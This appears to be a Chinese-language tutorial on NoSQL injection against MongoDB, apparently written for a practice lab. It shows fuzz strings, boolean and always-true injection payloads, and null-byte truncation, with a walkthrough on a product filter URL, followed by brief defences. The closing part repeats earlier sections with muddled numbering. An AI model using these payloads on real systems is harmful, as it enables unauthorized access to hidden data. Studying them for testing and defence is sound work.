NoSQL注入专题教学文档<\/h1>

1. NoSQL数据库概述<\/h2>

NoSQL数据库是为解决关系型数据库在可扩展性、性能和灵活性上的不足而设计的数据库类型。主要特点：<\/p>

不使用表和关系存储数据<\/li>
使用键-值对、文档、列族或图形数据模型<\/li>
支持灵活的数据模式，无需预定义表结构<\/li>

在处理大数据量、高并发读写时性能更高<\/li> <\/ul>

NoSQL数据库类型<\/h3>

文档存储<\/strong>：使用JSON、BSON或XML格式存储数据<\/p>

示例：MongoDB、Couchbase<\/li>
查询方式：API或查询语言<\/li> <\/ul> <\/li>

键值存储<\/strong>：以键值格式存储数据<\/p>

示例：Redis、Amazon DynamoDB<\/li>
查询方式：通过唯一键检索值<\/li> <\/ul> <\/li>

宽列存储<\/strong>：将相关数据组织到灵活的列族中<\/p>

示例：Apache Cassandra、Apache HBase<\/li> <\/ul> <\/li>

图形数据库<\/strong>：使用节点存储数据实体，边存储实体关系<\/p>

示例：Neo4j、Amazon Neptune<\/li> <\/ul> <\/li> <\/ol>
2. NoSQL注入类型<\/h2>
2.1 语法注入<\/h3>
当攻击者能够破坏NoSQL查询语法，注入自己的payload时发生。与SQL注入类似，但因NoSQL数据库使用不同的查询语言和数据结构而有所差异。<\/p>
2.2 运算符注入<\/h3>
当攻击者可以使用NoSQL查询运算符来操纵查询时发生。<\/p>
3. MongoDB中的NoSQL语法注入<\/h2>
3.1 探测注入漏洞<\/h3>
测试方法<\/strong>：<\/p>

提交模糊字符串和特殊字符测试每个输入<\/li>
如果应用程序未充分清理或过滤，会触发数据库错误或其他可检测行为<\/li> <\/ol>
示例模糊字符串<\/strong>：<\/p>
'"`{;$Foo}$Foo \xYZ <\/code><\/pre> URL编码后：<\/p> '%22%60%7b%0d%0a%3b%24Foo%7d%0d%0a%24Foo%20%5cxYZ%00 <\/code><\/pre> 或：<\/p> '\"`{\r;$Foo}\n$Foo \\xYZ\u0000 <\/code><\/pre> 3.2 确定语法字符<\/h3> 测试单引号('<\/code>)：<\/p> this.category == ''' <\/code><\/pre> 如果引发异常，说明字符破坏了语法<\/li> <\/ul> <\/li> 验证猜想：<\/p> this.category == '\'' <\/code><\/pre> 如果不报错，确认存在注入可能<\/li> <\/ul> <\/li> <\/ol> 3.3 确认条件行为<\/h3> 发送两条请求测试布尔判断：<\/p> 真条件：<\/p> ' && 1 && 'x <\/code><\/pre> URL编码：<\/p> '+%26%26+1+%26%26+'x <\/code><\/pre> <\/li> 假条件：<\/p> ' && 0 && 'x <\/code><\/pre> URL编码：<\/p> '+%26%26+0+%26%26+'x <\/code><\/pre> <\/li> <\/ol> 如果响应不同，说明注入影响了查询逻辑<\/li> <\/ul> 3.4 覆盖现有条件<\/h3> 注入永真条件：<\/p> '||1||' <\/code><\/pre> URL编码：<\/p> '%27%7c%7c%31%7c%7c%27 <\/code><\/pre> 后端查询：<\/p> this.category == 'fizzy'||'1'=='1' <\/code><\/pre> 会返回所有结果，包括隐藏商品<\/li> <\/ul> <\/li> 使用空字符取消限制：<\/p> fizzy'%00 <\/code><\/pre> 后端处理：<\/p> this.category == 'fizzy'\u0000' && this.released == 1 <\/code><\/pre> 空字符使后续条件失效<\/li> <\/ul> <\/li> <\/ol> 4. 靶场示例<\/h2> 目标<\/strong>：利用NoSQL注入列出所有商品<\/p> 步骤<\/strong>：<\/p> 访问筛选URL： \/filter?category=Gifts <\/code><\/pre> <\/li> 测试注入： \/filter?category=Gifts'%22%60%7b%0d%0a%3b%24Foo%7d%0d%0a%24Foo%20%5cxYZ%00 <\/code><\/pre> 观察是否出现错误<\/li> <\/ul> <\/li> 尝试永真条件： \/filter?category=Gifts'||1||' <\/code><\/pre> 或使用空字符： \/filter?category=Gifts'%00 <\/code><\/pre> <\/li> <\/ol> 5. 防御措施<\/h2> 输入验证和过滤<\/li> 使用参数化查询<\/li> 实施最小权限原则<\/li> 对特殊字符进行转义处理<\/li> 使用ORM框架提供的安全方法<\/li> <\/ol> 6. 总结<\/h2> NoSQL注入与SQL注入原理相似但实现方式不同，主要利用：<\/p> 语法注入破坏查询结构<\/li> 运算符注入操纵查询逻辑<\/li> 通过布尔条件测试和永真条件绕过限制<\/li> <\/ul> 理解目标数据库的查询语法和特殊字符是成功利用NoSQL注入的关键。<\/p>

NoSQL注入专题教学文档<\/h1>

2. NoSQL注入类型<\/h2>

2.1 语法注入<\/h3> 当攻击者能够破坏NoSQL查询语法，注入自己的payload时发生。与SQL注入类似，但因NoSQL数据库使用不同的查询语言和数据结构而有所差异。<\/p>

2.2 运算符注入<\/h3> 当攻击者可以使用NoSQL查询运算符来操纵查询时发生。<\/p>

3. MongoDB中的NoSQL语法注入<\/h2>

2.1 语法注入<\/h3>
当攻击者能够破坏NoSQL查询语法，注入自己的payload时发生。与SQL注入类似，但因NoSQL数据库使用不同的查询语言和数据结构而有所差异。<\/p>

2.2 运算符注入<\/h3>
当攻击者可以使用NoSQL查询运算符来操纵查询时发生。<\/p>